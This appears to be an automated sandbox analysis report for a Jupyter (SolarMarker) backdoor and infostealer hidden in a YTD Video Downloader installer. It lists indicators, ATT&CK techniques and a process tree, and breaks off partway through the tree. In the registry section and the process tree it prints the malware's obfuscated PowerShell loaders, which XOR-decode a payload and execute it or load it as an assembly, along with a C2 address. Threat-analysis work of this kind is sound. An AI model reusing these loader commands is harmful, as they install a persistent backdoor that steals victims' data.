jupyter | 659d0068bbfb9ac0b53dd19025cb1a181d12599ec69595d0d1081e69d13fbbea

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-12-2024 07:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.exe
Size

118.8MB
MD5

318799e4892e75fc62dc351d311e701d
SHA1

888d333a39a871c3aff5cf1b7c0af2e4eae1e834
SHA256

7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026
SHA512

260e1726edfae089cf972472c233f616cb5c3e9da8b63632a525ea1191cc9231fa1543aace28db470a2e25fd51b88a48dfca6b634b42ecee3feb50fef7f28531
SSDEEP

393216:DpzBr1SCF0LIUYuFBmY54NEZPb+ON8IoJn:DFBrxM5YuF4jNePbHxoJn

Score

10^/10

jupyter backdoor discovery execution stealer trojan

Malware Config

Extracted

Family

jupyter

Version

IL-5

http://185.244.213.64

Signatures

Jupyter Backdoor/Client payload 1 IoCs

resource	yara_rule
behavioral2/memory/3500-489-0x0000000004D50000-0x0000000004D64000-memory.dmp	family_jupyter

Jupyter family
jupyter
Jupyter, SolarMarker
Jupyter is a backdoor and infostealer first seen in mid 2020.
backdoor trojan stealer jupyter

Blocklisted process makes network request 3 IoCs

flow	pid	Process
129	3500	powershell.exe
134	3500	powershell.exe
140	3500	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.tmp

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\MICROsoFT\WinDows\StaRt MEnu\pRoGRAms\stArtUp\a75d7a747a94249b101f5073eae3c.LnK	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
5000	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.tmp
1272	YTDSetup.exe
1168	ytd.exe

Loads dropped DLL 34 IoCs

pid	Process
5000	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.tmp
5000	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.tmp
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1168	ytd.exe
1168	ytd.exe
1168	ytd.exe
1168	ytd.exe
1168	ytd.exe
1168	ytd.exe
1168	ytd.exe
1168	ytd.exe
1168	ytd.exe
1168	ytd.exe
1168	ytd.exe
1168	ytd.exe
1168	ytd.exe
1168	ytd.exe
1168	ytd.exe
1168	ytd.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3500	powershell.exe

Drops file in Program Files directory 55 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libaudio_format_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1026.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1049.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1061.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2052.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libwingdi_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1031.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1036.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libugly_resampler_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_output\libdirectsound_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\codec\libavcodec_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1050.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1033.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1048.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\FFMPEG.EXE	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1035.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res9999.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\manual.bat	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1045.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1051.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1053.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1055.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1060.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2074.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\scripts.yds	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1044.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\plugins.dat.1168	ytd.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlc.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\access\libfilesystem_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libinteger_mixer_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2070.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.LGPLv3	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\LICENSE	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1043.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libvmem_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlccore.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1034.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1059.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libfloat_mixer_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_filter\libswscale_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdrawable_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1038.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Uninstall.exe	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.Apachev2	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1025.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1029.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1032.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1040.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1052.ini	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.LGPLv2	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\librtmp.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdirect3d_plugin.dll	YTDSetup.exe
File created	C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1030.ini	YTDSetup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YTDSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ytd.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\pcrtayuhfkgvj\shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\pcrtayuhfkgvj\shell\open	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\pcrtayuhfkgvj\shell\open\command\ = "poWErSHELl -winDowstylE HiDDEn -Ep BYPASs -CommAND \"$aaa09c21ac249b97122ad51333702='QFNNS0JAfDN1al5NYH00QHNPcDNeU1FFO0Bzb3EzQHx1KlZeUXhWcEB2ZVpWQDNAS2Rpa3p6SW52bjg8aS1ZaSp5T3tFanhRRnFvdGN2cnZyanFvSmk9el5SPTA+XlE/b2ZAdXJ4S0B3Y2c/XlEoPSZAVCNNbUB7WHtKXlAtJUNAdWBIOV5TUHE2QHZeQ21AdFZCNg==';$acc4b49c14a45abfef0cf4da525b0=[sysTem.iO.FIle]::rEaDaLlBYTEs('C:\\Users\\Admin\\AppData\\Roaming\\mIcrosoFt\\imjauHzOypkEMrXn\\EzNqCdODjcnRQW.WjazoXEusM');foR($a3ad59cce6d43fa8ab4542488f5eb=0;$a3ad59cce6d43fa8ab4542488f5eb -LT $acc4b49c14a45abfef0cf4da525b0.couNt;){FOr($a3a52f0ca364e7add21c6b0c131ca=0;$a3a52f0ca364e7add21c6b0c131ca -lT $aaa09c21ac249b97122ad51333702.LENGth;$a3a52f0ca364e7add21c6b0c131ca++){$acc4b49c14a45abfef0cf4da525b0[$a3ad59cce6d43fa8ab4542488f5eb]=$acc4b49c14a45abfef0cf4da525b0[$a3ad59cce6d43fa8ab4542488f5eb] -BXor $aaa09c21ac249b97122ad51333702[$a3a52f0ca364e7add21c6b0c131ca];$a3ad59cce6d43fa8ab4542488f5eb++;if($a3ad59cce6d43fa8ab4542488f5eb -ge $acc4b49c14a45abfef0cf4da525b0.cOuNt){$a3a52f0ca364e7add21c6b0c131ca=$aaa09c21ac249b97122ad51333702.lENgth}}};[syStem.rEFlEcTIon.aSSemBLy]::lOaD($acc4b49c14a45abfef0cf4da525b0);[mARs.DEimoS]::INteRAcT()\""	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\.rnjtzbledycm	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\.rnjtzbledycm\ = "pcrtayuhfkgvj"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\pcrtayuhfkgvj\shell\open\command	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\pcrtayuhfkgvj	powershell.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
1272	YTDSetup.exe
3500	powershell.exe
3500	powershell.exe
4700	msedge.exe
4700	msedge.exe
1680	msedge.exe
1680	msedge.exe
6096	identity_helper.exe
6096	identity_helper.exe
5108	msedge.exe
5108	msedge.exe
5108	msedge.exe
5108	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3500	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1168	ytd.exe

Suspicious use of SendNotifyMessage 25 IoCs

pid	Process
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1168	ytd.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1168	ytd.exe
1168	ytd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3552 wrote to memory of 5000	3552	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.exe	83
PID 3552 wrote to memory of 5000	3552	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.exe	83
PID 3552 wrote to memory of 5000	3552	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.exe	83
PID 5000 wrote to memory of 1272	5000	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.tmp	85
PID 5000 wrote to memory of 1272	5000	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.tmp	85
PID 5000 wrote to memory of 1272	5000	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.tmp	85
PID 5000 wrote to memory of 3500	5000	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.tmp	94
PID 5000 wrote to memory of 3500	5000	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.tmp	94
PID 5000 wrote to memory of 3500	5000	7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.tmp	94
PID 1272 wrote to memory of 4344	1272	YTDSetup.exe	98
PID 1272 wrote to memory of 4344	1272	YTDSetup.exe	98
PID 1660 wrote to memory of 1680	1660	explorer.exe	100
PID 1660 wrote to memory of 1680	1660	explorer.exe	100
PID 1680 wrote to memory of 1088	1680	msedge.exe	103
PID 1680 wrote to memory of 1088	1680	msedge.exe	103
PID 1272 wrote to memory of 1120	1272	YTDSetup.exe	104
PID 1272 wrote to memory of 1120	1272	YTDSetup.exe	104
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 1968	1680	msedge.exe	106
PID 1680 wrote to memory of 4700	1680	msedge.exe	107
PID 1680 wrote to memory of 4700	1680	msedge.exe	107
PID 1680 wrote to memory of 2376	1680	msedge.exe	108
PID 1680 wrote to memory of 2376	1680	msedge.exe	108
PID 1680 wrote to memory of 2376	1680	msedge.exe	108
PID 1680 wrote to memory of 2376	1680	msedge.exe	108
PID 1680 wrote to memory of 2376	1680	msedge.exe	108

C:\Users\Admin\AppData\Local\Temp\7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.exe
"C:\Users\Admin\AppData\Local\Temp\7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3552
- C:\Users\Admin\AppData\Local\Temp\is-E946B.tmp\7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-E946B.tmp\7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.tmp" /SL5="$3017A,123565381,999936,C:\Users\Admin\AppData\Local\Temp\7ce31f51f539761f9922bec50d38c6b9c0d6cc3a912517d947bc0a49dd507026.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5000
- - C:\Users\Admin\AppData\Local\Temp\is-2MGFO.tmp\YTDSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\is-2MGFO.tmp\YTDSetup.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1272
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe" "http://www.ytddownloader.com/thankyou.html?isn=530A9BCFE2724896897C4C275C085331&lang=1033&cid=398eb4bfe45e9ea9e5942f5880bf954d&oldVer=&newVer=5.9.18&kt=ytdd&pv=0"
      4⤵
      PID:4344
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe" "C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe"
      4⤵
      PID:1120
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$a237ba8d9ba3a23c37fe130f9608c60a='C:\Users\Admin\da2bbd7ef028e1e821d69bbd23d51221\cd60c5937b1fcc7213d45816bfd13fe7\7b66c9556c2ec989215d843039b3b1a0\cfc7af7400797654a5097e937584876e\43ee4f5abd30d3a2d03bbc2e7afaf3ee\1a15595747bc44e2593101e2d537d190\c9b166feaa1d05cb17157e3f1373b46d';$a4a6fd2e810da1ed45bb30ec016b9265='MZIXzuTonYaLEHWJArjKmDVivCtNUGxhFSBOcyqblpgekdfRQwsP';$78bcc25c7f446c68c1668d220b875042=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($a237ba8d9ba3a23c37fe130f9608c60a));remove-item $a237ba8d9ba3a23c37fe130f9608c60a;for($i=0;$i -lt $78bcc25c7f446c68c1668d220b875042.count;){for($j=0;$j -lt $a4a6fd2e810da1ed45bb30ec016b9265.length;$j++){$78bcc25c7f446c68c1668d220b875042[$i]=$78bcc25c7f446c68c1668d220b875042[$i] -bxor $a4a6fd2e810da1ed45bb30ec016b9265[$j];$i++;if($i -ge $78bcc25c7f446c68c1668d220b875042.count){$j=$a4a6fd2e810da1ed45bb30ec016b9265.length}}};$78bcc25c7f446c68c1668d220b875042=[System.Text.Encoding]::UTF8.GetString($78bcc25c7f446c68c1668d220b875042);iex $78bcc25c7f446c68c1668d220b875042;"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3500

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:1660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ytddownloader.com/thankyou.html?isn=530A9BCFE2724896897C4C275C085331&lang=1033&cid=398eb4bfe45e9ea9e5942f5880bf954d&oldVer=&newVer=5.9.18&kt=ytdd&pv=0
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1680
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7ffa81aa46f8,0x7ffa81aa4708,0x7ffa81aa4718
    3⤵
    PID:1088
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
    3⤵
    PID:1968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4700
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
    3⤵
    PID:2376
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
    3⤵
    PID:3656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
    3⤵
    PID:536
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
    3⤵
    PID:2524
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,17645352012516266871,13288885195053834556,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
    3⤵
    PID:3688
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
